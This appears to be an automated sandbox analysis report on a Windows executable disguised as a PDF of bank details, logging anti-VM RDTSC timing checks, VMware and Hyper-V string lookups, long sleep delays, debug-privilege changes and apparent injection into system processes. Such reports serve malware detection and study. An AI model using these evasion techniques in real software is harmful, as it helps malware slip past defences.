          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeRDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\WWAHost.exeRDTSC instruction interceptor: First address: 0000000002938604 second address: 000000000293860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\WWAHost.exeRDTSC instruction interceptor: First address: 000000000293899E second address: 00000000029389A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exe TID: 6532Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exe TID: 6492Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 6776Thread sleep time: -35000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exe TID: 5252Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\WWAHost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_004088D0 rdtsc 5_2_004088D0
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeAPI coverage: 8.5 %
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000006.00000000.275252834.0000000008A32000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000006.00000000.275252834.0000000008A32000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000006.00000000.275761406.0000000008B88000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.275761406.0000000008B88000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
          Source: explorer.exe, 00000006.00000000.302914941.00000000048E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.275598916.0000000008ACF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
          Source: explorer.exe, 00000006.00000000.275761406.0000000008B88000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
          Source: explorer.exe, 00000006.00000000.275598916.0000000008ACF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000006.00000000.272260191.00000000069DA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD002
          Source: explorer.exe, 00000006.00000000.296301259.0000000008DE7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}II
          Source: BANK DETAILS-25012022-971332pdf.exe, 00000001.00000002.262849939.000000000121B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll``
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_004088D0 rdtsc 5_2_004088D0
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018AC182 mov eax, dword ptr fs:[00000030h]5_2_018AC182
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018BA185 mov eax, dword ptr fs:[00000030h]5_2_018BA185
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018B2990 mov eax, dword ptr fs:[00000030h]5_2_018B2990
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018B61A0 mov eax, dword ptr fs:[00000030h]5_2_018B61A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018B61A0 mov eax, dword ptr fs:[00000030h]5_2_018B61A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_019051BE mov eax, dword ptr fs:[00000030h]5_2_019051BE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_019051BE mov eax, dword ptr fs:[00000030h]5_2_019051BE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_019051BE mov eax, dword ptr fs:[00000030h]5_2_019051BE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_019051BE mov eax, dword ptr fs:[00000030h]5_2_019051BE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_019449A4 mov eax, dword ptr fs:[00000030h]5_2_019449A4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_019449A4 mov eax, dword ptr fs:[00000030h]5_2_019449A4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_019449A4 mov eax, dword ptr fs:[00000030h]5_2_019449A4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_019449A4 mov eax, dword ptr fs:[00000030h]5_2_019449A4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_019069A6 mov eax, dword ptr fs:[00000030h]5_2_019069A6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0188B1E1 mov eax, dword ptr fs:[00000030h]5_2_0188B1E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0188B1E1 mov eax, dword ptr fs:[00000030h]5_2_0188B1E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0188B1E1 mov eax, dword ptr fs:[00000030h]5_2_0188B1E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_019141E8 mov eax, dword ptr fs:[00000030h]5_2_019141E8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01889100 mov eax, dword ptr fs:[00000030h]5_2_01889100
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01889100 mov eax, dword ptr fs:[00000030h]5_2_01889100
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01889100 mov eax, dword ptr fs:[00000030h]5_2_01889100
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018A4120 mov eax, dword ptr fs:[00000030h]5_2_018A4120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018A4120 mov eax, dword ptr fs:[00000030h]5_2_018A4120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018A4120 mov eax, dword ptr fs:[00000030h]5_2_018A4120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018A4120 mov eax, dword ptr fs:[00000030h]5_2_018A4120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018A4120 mov ecx, dword ptr fs:[00000030h]5_2_018A4120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018B513A mov eax, dword ptr fs:[00000030h]5_2_018B513A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018B513A mov eax, dword ptr fs:[00000030h]5_2_018B513A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018AB944 mov eax, dword ptr fs:[00000030h]5_2_018AB944
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018AB944 mov eax, dword ptr fs:[00000030h]5_2_018AB944
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0188C962 mov eax, dword ptr fs:[00000030h]5_2_0188C962
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0188B171 mov eax, dword ptr fs:[00000030h]5_2_0188B171
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0188B171 mov eax, dword ptr fs:[00000030h]5_2_0188B171
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01889080 mov eax, dword ptr fs:[00000030h]5_2_01889080
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01903884 mov eax, dword ptr fs:[00000030h]5_2_01903884
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01903884 mov eax, dword ptr fs:[00000030h]5_2_01903884
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018C90AF mov eax, dword ptr fs:[00000030h]5_2_018C90AF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018B20A0 mov eax, dword ptr fs:[00000030h]5_2_018B20A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018B20A0 mov eax, dword ptr fs:[00000030h]5_2_018B20A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018B20A0 mov eax, dword ptr fs:[00000030h]5_2_018B20A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018B20A0 mov eax, dword ptr fs:[00000030h]5_2_018B20A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018B20A0 mov eax, dword ptr fs:[00000030h]5_2_018B20A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018B20A0 mov eax, dword ptr fs:[00000030h]5_2_018B20A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018BF0BF mov ecx, dword ptr fs:[00000030h]5_2_018BF0BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018BF0BF mov eax, dword ptr fs:[00000030h]5_2_018BF0BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018BF0BF mov eax, dword ptr fs:[00000030h]5_2_018BF0BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0191B8D0 mov eax, dword ptr fs:[00000030h]5_2_0191B8D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0191B8D0 mov ecx, dword ptr fs:[00000030h]5_2_0191B8D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0191B8D0 mov eax, dword ptr fs:[00000030h]5_2_0191B8D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0191B8D0 mov eax, dword ptr fs:[00000030h]5_2_0191B8D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0191B8D0 mov eax, dword ptr fs:[00000030h]5_2_0191B8D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0191B8D0 mov eax, dword ptr fs:[00000030h]5_2_0191B8D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018858EC mov eax, dword ptr fs:[00000030h]5_2_018858EC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018840E1 mov eax, dword ptr fs:[00000030h]5_2_018840E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018840E1 mov eax, dword ptr fs:[00000030h]5_2_018840E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018840E1 mov eax, dword ptr fs:[00000030h]5_2_018840E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01954015 mov eax, dword ptr fs:[00000030h]5_2_01954015
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01954015 mov eax, dword ptr fs:[00000030h]5_2_01954015
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01907016 mov eax, dword ptr fs:[00000030h]5_2_01907016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01907016 mov eax, dword ptr fs:[00000030h]5_2_01907016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01907016 mov eax, dword ptr fs:[00000030h]5_2_01907016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0189B02A mov eax, dword ptr fs:[00000030h]5_2_0189B02A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0189B02A mov eax, dword ptr fs:[00000030h]5_2_0189B02A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0189B02A mov eax, dword ptr fs:[00000030h]5_2_0189B02A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0189B02A mov eax, dword ptr fs:[00000030h]5_2_0189B02A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018B002D mov eax, dword ptr fs:[00000030h]5_2_018B002D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018B002D mov eax, dword ptr fs:[00000030h]5_2_018B002D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018B002D mov eax, dword ptr fs:[00000030h]5_2_018B002D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018B002D mov eax, dword ptr fs:[00000030h]5_2_018B002D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018B002D mov eax, dword ptr fs:[00000030h]5_2_018B002D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018A0050 mov eax, dword ptr fs:[00000030h]5_2_018A0050
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018A0050 mov eax, dword ptr fs:[00000030h]5_2_018A0050
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01951074 mov eax, dword ptr fs:[00000030h]5_2_01951074
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01942073 mov eax, dword ptr fs:[00000030h]5_2_01942073
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01891B8F mov eax, dword ptr fs:[00000030h]5_2_01891B8F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01891B8F mov eax, dword ptr fs:[00000030h]5_2_01891B8F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0193D380 mov ecx, dword ptr fs:[00000030h]5_2_0193D380
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018BB390 mov eax, dword ptr fs:[00000030h]5_2_018BB390
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018B2397 mov eax, dword ptr fs:[00000030h]5_2_018B2397
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0194138A mov eax, dword ptr fs:[00000030h]5_2_0194138A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018B4BAD mov eax, dword ptr fs:[00000030h]5_2_018B4BAD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018B4BAD mov eax, dword ptr fs:[00000030h]5_2_018B4BAD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018B4BAD mov eax, dword ptr fs:[00000030h]5_2_018B4BAD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01955BA5 mov eax, dword ptr fs:[00000030h]5_2_01955BA5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_019053CA mov eax, dword ptr fs:[00000030h]5_2_019053CA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_019053CA mov eax, dword ptr fs:[00000030h]5_2_019053CA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018ADBE9 mov eax, dword ptr fs:[00000030h]5_2_018ADBE9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018B03E2 mov eax, dword ptr fs:[00000030h]5_2_018B03E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018B03E2 mov eax, dword ptr fs:[00000030h]5_2_018B03E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018B03E2 mov eax, dword ptr fs:[00000030h]5_2_018B03E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018B03E2 mov eax, dword ptr fs:[00000030h]5_2_018B03E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018B03E2 mov eax, dword ptr fs:[00000030h]5_2_018B03E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018B03E2 mov eax, dword ptr fs:[00000030h]5_2_018B03E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0194131B mov eax, dword ptr fs:[00000030h]5_2_0194131B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0188DB40 mov eax, dword ptr fs:[00000030h]5_2_0188DB40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01958B58 mov eax, dword ptr fs:[00000030h]5_2_01958B58
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0188F358 mov eax, dword ptr fs:[00000030h]5_2_0188F358
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0188DB60 mov ecx, dword ptr fs:[00000030h]5_2_0188DB60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018B3B7A mov eax, dword ptr fs:[00000030h]5_2_018B3B7A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018B3B7A mov eax, dword ptr fs:[00000030h]5_2_018B3B7A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018BD294 mov eax, dword ptr fs:[00000030h]5_2_018BD294
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018BD294 mov eax, dword ptr fs:[00000030h]5_2_018BD294
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018852A5 mov eax, dword ptr fs:[00000030h]5_2_018852A5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018852A5 mov eax, dword ptr fs:[00000030h]5_2_018852A5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018852A5 mov eax, dword ptr fs:[00000030h]5_2_018852A5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018852A5 mov eax, dword ptr fs:[00000030h]5_2_018852A5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018852A5 mov eax, dword ptr fs:[00000030h]5_2_018852A5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0189AAB0 mov eax, dword ptr fs:[00000030h]5_2_0189AAB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0189AAB0 mov eax, dword ptr fs:[00000030h]5_2_0189AAB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018BFAB0 mov eax, dword ptr fs:[00000030h]5_2_018BFAB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018B2ACB mov eax, dword ptr fs:[00000030h]5_2_018B2ACB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018B2AE4 mov eax, dword ptr fs:[00000030h]5_2_018B2AE4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0194AA16 mov eax, dword ptr fs:[00000030h]5_2_0194AA16
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0194AA16 mov eax, dword ptr fs:[00000030h]5_2_0194AA16
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01898A0A mov eax, dword ptr fs:[00000030h]5_2_01898A0A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018A3A1C mov eax, dword ptr fs:[00000030h]5_2_018A3A1C
